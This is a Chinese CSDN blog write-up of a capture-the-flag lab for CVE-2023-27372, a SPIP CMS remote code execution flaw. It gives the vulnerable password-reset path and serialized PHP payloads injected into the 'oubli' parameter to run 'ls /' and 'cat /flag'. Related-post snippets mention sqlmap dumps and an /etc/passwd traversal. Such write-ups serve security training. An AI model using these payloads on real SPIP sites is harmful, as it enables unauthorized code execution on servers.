春秋云境CVE-2023-27372

已于 2024-03-17 13:26:29 修改
阅读量537 收藏
点赞数 13
分类专栏: 春秋云境 文章标签: web安全 安全
于 2024-03-16 15:37:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64432806/article/details/136763558
版权

适用版本

SPIP cms V4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤从而触发命令执行漏洞。

漏洞所在地

/spip.php?page=spip_pass&lang=fr

正文

首先我们进入到靶场后,点击此处进入到登录界面

再点击此处进入到修改密码的界面

抓包

然后随便填写一个邮箱格式进行抓包。

抓完包后在参数oubli的地方进行反序列化绕过。

修改参数

修改参数内容为s:24:"<?php+system('ls+/');+?>";"发现找到flag

找flag

再输入s:29:"<?php+system('cat+/flag');+?>";"就可以找到flag值了。

是花花呢
关注
  • 13
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
SPIP远程代码执行漏洞(CVE-2023-27372)
holyxp的博客
07-14 1625
下载链接:https://pan.baidu.com/s/1kCG5D4PMwY5wKeR47yL6iA?_pass),重置密码时 protege_champ()函数没有对序列化字符串进行过滤,从而触发命令执行漏洞。2、命令执行失败:(1)看一下禁用函数。(2)更换命令执行函数。(4)系统环境问题。3、响应包搜索id='oubli’就是命令执行的结果。1、注意看清目标是什么系统,不一定只是Linux。漏洞存在与密码重置功能(漏洞点位url:/**FOFA语句:**app=“SPIP”
Joomla存在未授权访问漏洞【CVE-2023-23752】
holyxp的博客
06-27 553
Joomla是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。
春秋云镜 CVE-2023-23752
qq274575499的博客
03-30 598
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。
漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
m0_65454485的博客
08-08 1748
漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
有意思的CVE-2022-0337复现
蚁景网安学院
04-23 839
前两天在刷tw,看到了个比较有意思的一个CVE漏洞,价奖励是10000美刀,比较好奇的是价10000美刀的漏洞是什么样子的,漏洞利用就是需要在浏览器进行用户交互才能触发该漏洞,但由于 Windows 的文件保存默认为接受,通过使用强制您按 ENTER 约 2 秒的技巧简单地泄漏数十个环境变量。
春秋云境CVE-2023-1313
m0_64432806的博客
03-27 610
春秋云境CVE-2023-1313 cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器打开/install来运行安装
春秋云境CVE-2023-7105
2303_76653367的博客
05-09 411
E-Commerce Website 1.0 允许通过“index_search.php”的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库的最新漏洞.3.保存POST包,sqlmap跑,爆库。2.下拉找到搜索框,随便输入,抓包。
春秋云境CVE-2023-52064
shr592833253的博客
04-08 640
在kali上执行命令 sqlmap -r xxx.txt --dbs --batch (xxx.txt为你所构造的POC)最后执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag -C flag --dump。再次执行 sqlmap -r xxx.txt -D wuzhicms -T flllaaaag --columns。然后执行 sqlmap -r xxx.txt -D wuzhicms --tables。在尝试目录扫描后未发现有用的路径。
春秋云境CVE-2023-27179
dsasdasdd的博客
04-24 149
题目:GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。发现flag{da698f58-b391-469b-a90c-5d5a2241e1ad}发现../../../../../etc/passwd应该是有东西的。只有一个界面,进入到他题目给到的路径看一眼。发现会以照片的形式下载下来但是照片是损坏的。放到repeater里面找一下flag。没有思路,去看一下原作者的poc。
春秋云境 CVE-2022-4230过关
weixin_49898946的博客
05-02 880
春秋云境 CVE-2022-4230 获取flag
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
一键备份升级Openssh9.5p1 解决CVE-2023-38408,具体步骤见
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
网络安全攻防基础入门笔记--操作系统&名词解释&文件下载&反弹shell&防火墙绕过
谜语人的博客
06-15 1112
全程Proof of Concept,文"概念验证",常指一段漏洞证明的代码
网络安全(补充)
m0_62207482的博客
06-15 583
物理安全威胁一般分为自然安全威胁和人为安全威胁。自然安全威胁包括地震、洪水、火灾、鼠害、雷电;;;;人为安全威胁包括盗窃、爆炸、毁坏、硬件安全 防火墙白名单策略:只允许符合安全规则的包通过防火墙,其他通信包禁止 防火墙名单策略:禁止与安全规则相冲突的包通过防火墙,其他通信包都允许 将入侵检测系统置于防火墙内部,使得很多对网络的攻击首先被防火墙过滤,也就是防火墙是首当其冲的,从而减少了对内部入侵检测系统的干扰,提高入侵检测系统的准确率,但是其检测能力不会变化 通过VPN技术,企业可以在远程用户、分
深信服科技:2023网络安全深度洞察及2024年趋势研判报告
最新发布
2301_76786857的博客
06-19 197
2023 年,生成式人工智能和各种大模型迅速应用在网络攻击与对抗,带来了新型攻防场景和安全威胁。漏洞利用链组合攻击实现攻击效果加成,在国家级对抗频繁使用。勒索团伙广泛利用多个信创系统漏洞,对企业数据安全与财产安全造成了严重威胁。数据泄露问题频频出现,个人信息泄露成为了关注的焦点;同时,境外网络攻击势力不断刺探,APT 攻击技术不断更新。 2023年网络安全呈现出哪些演变趋势?本报告将重点围绕安全漏洞、恶意软件、数据安全和 APT攻击四个领域展开观察,并对 2024 年网络安全需重点关注的方向进行深入思考
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值